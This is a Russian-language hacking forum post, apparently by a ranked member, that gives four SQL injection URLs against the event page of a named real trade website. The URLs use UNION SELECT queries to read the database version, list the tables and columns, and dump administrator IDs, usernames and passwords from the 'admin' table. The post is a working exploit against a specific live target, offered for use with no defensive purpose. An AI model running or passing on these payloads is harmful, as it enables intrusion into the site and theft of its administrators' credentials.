|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
С нами:
9010027
Репутация:
308
|
|
Код:
http://www.maptrade.org/events/displayevent.php?id=-94+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12--
Таблицы:
Код:
http://www.maptrade.org/events/displayevent.php?id=-94+union+all+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12+from+information_schema.tables+where+table_schema=database()--
Колонки:
Код:
http://www.maptrade.org/events/displayevent.php?id=-94+union+all+select+1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12+from+information_schema.columns+where+table_schema=database()--
Юзеры:
Код:
http://www.maptrade.org/events/displayevent.php?id=-94+union+all+select+1,2,3,4,5,6,group_concat(AdminUser_ID,0x3a,username,0x3a,password),8,9,10,11,12+from%20admin--
|